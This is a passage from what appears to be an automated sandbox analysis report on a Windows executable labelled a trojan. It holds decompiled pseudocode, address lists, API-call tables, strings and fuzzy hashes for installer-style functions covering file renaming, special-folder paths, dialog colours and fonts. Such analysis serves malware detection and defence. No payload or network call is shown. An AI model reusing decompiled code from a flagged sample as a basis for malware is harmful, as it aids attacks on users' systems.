					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406183
0x0040618c
0x00406193
0x0040619d
0x004061b1
0x004061d9
0x004061e4
0x004061e8
0x00406208
0x0040620f
0x00406219
0x00406226
0x0040622b
0x00406230
0x00406234
0x00406243
0x00406245
0x00406252
0x00406256
0x004062f1
0x00000000
0x0040626c
0x00406279
0x0040629d
0x004062a1
0x004062c0
0x004062c4
0x004062c4
0x004062c6
0x004062cf
0x004062da
0x004062e5
0x004062eb
0x00000000
0x004062eb
0x004062a3
0x004062a6
0x004062b1
0x004062ad
0x004062af
0x004062b0
0x004062b0
0x004062b8
0x004062ba
0x00000000
0x004062ba
0x00406284
0x0040628a
0x00000000
0x0040628a
0x00406256
0x00406234
0x004061b3
0x004061be
0x004061c7
0x004061cb
0x00000000
0x00000000
0x004061cb
0x004062fc

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

[Rename], xrefs: 0040626C, 0040627E
%ls=%ls, xrefs: 004061F8

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				intOrPtr _t93;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t93 =  *0x433edc; // 0x544f92
					_t44 =  *(_t93 - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x0040657a
0x0040657a
0x0040657a
0x00406580
0x00406585
0x00406587
0x00406596
0x00406596
0x0040659e
0x0040659f
0x004065a0
0x004065a1
0x004065a4
0x004065ac
0x004065ae
0x004065bf
0x004065c2
0x004065c2
0x004065c6
0x004065cc
0x004065cf
0x004067aa
0x004067aa
0x004067b5
0x004067c1
0x004067c1
0x00000000
0x004065d5
0x004065da
0x004065ef
0x004065f0
0x004065f6
0x00406788
0x00406796
0x00406799
0x00406799
0x0040678a
0x0040678d
0x00406790
0x00406792
0x00406792
0x0040679b
0x0040679b
0x004067a1
0x004067a4
0x004065d7
0x00000000
0x004065d7
0x00000000
0x004067a4
0x004065fc
0x004065ff
0x0040660e
0x00406615
0x00406621
0x00406624
0x00406627
0x00406628
0x0040662d
0x00406633
0x00406636
0x00406639
0x0040672c
0x00406731
0x00406764
0x00406769
0x0040676e
0x00406773
0x00406773
0x00406778
0x0040677e
0x00406781
0x00000000
0x00406781
0x00406733
0x00406736
0x00406739
0x0040674e
0x00406755
0x0040673b
0x00406742
0x00406742
0x0040675d
0x00406760
0x00406724
0x00406725
0x00406725
0x00000000
0x00406760
0x00406646
0x0040664a
0x0040664a
0x0040664b
0x0040664d
0x0040668a
0x0040668d
0x0040669d
0x004066a0
0x004066a8
0x004066ae
0x004066ae
0x00406709
0x00406709
0x0040670b
0x00000000
0x00000000
0x004066b2
0x004066b7
0x004066b8
0x004066ba
0x004066d1
0x004066df
0x004066e5
0x004066e7
0x00406705
0x00406705
0x00406705
0x00000000
0x00406705
0x004066ed
0x004066f6
0x004066f9
0x004066ff
0x00406703
0x00000000
0x00000000
0x00000000
0x00406703
0x004066cb
0x004066cd
0x004066cf
0x00000000
0x00000000
0x00000000
0x004066cf
0x00000000
0x00406709
0x00406695
0x00000000
0x0040664f
0x0040666d
0x00406676
0x00406713
0x00406717
0x0040671f
0x0040671f
0x00000000
0x00406717
0x00406680
0x0040670d
0x00406711
0x00000000
0x00000000
0x00000000
0x00406711
0x0040664d
0x00000000
0x004065da

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000,00000000,004231B5,758D23A0), ref: 004066A8
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000), ref: 00406779

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Call, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7
Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll, xrefs: 0040659F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1818602907
Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404512
0x004045c8
0x00000000
0x004045c8
0x00404523
0x00404527
0x00000000
0x00404541
0x00404541
0x0040454a
0x00000000
0x00000000
0x0040454c
0x00404558
0x0040455b
0x0040455b
0x00404561
0x00404567
0x00404567
0x00404573
0x00404579
0x00404580
0x00404583
0x00404586
0x00404588
0x00404588
0x00404590
0x00404596
0x00404596
0x004045a0
0x004045a5
0x004045a8
0x004045ad
0x004045b0
0x004045b0
0x004045c0
0x004045c0
0x00000000
0x004045c3

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004067c6
0x004067cf
0x004067e6
0x004067e6
0x004067ed
0x004067f9
0x004067f9
0x004067fc
0x004067ff
0x00406804
0x00406806
0x0040680f
0x00406813
0x00406830
0x00406838
0x00406838
0x0040683d
0x0040683f
0x00406842
0x00406847
0x00406848
0x0040684c
0x0040684c
0x0040684d
0x00406854
0x00406856
0x0040685d
0x00000000
0x00000000
0x00406865
0x0040686b
0x00000000
0x00000000
0x00000000
0x0040686b
0x00406870

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,758D3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,758D3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,758D3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5
*?|<>/":, xrefs: 00406816

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2977677972
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e62
0x00404e6f
0x00404e75
0x00404eb3
0x00404eb3
0x00404ec2
0x00404ec9
0x00000000
0x00404ecb
0x00404e77
0x00404e86
0x00404e8e
0x00404e91
0x00404ea3
0x00404ea9
0x00404eb0
0x00000000
0x00404eb0
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Strings

Times New Roman, xrefs: 00401EB9

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID: Times New Roman
API String ID: 2584051700-927190056
Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
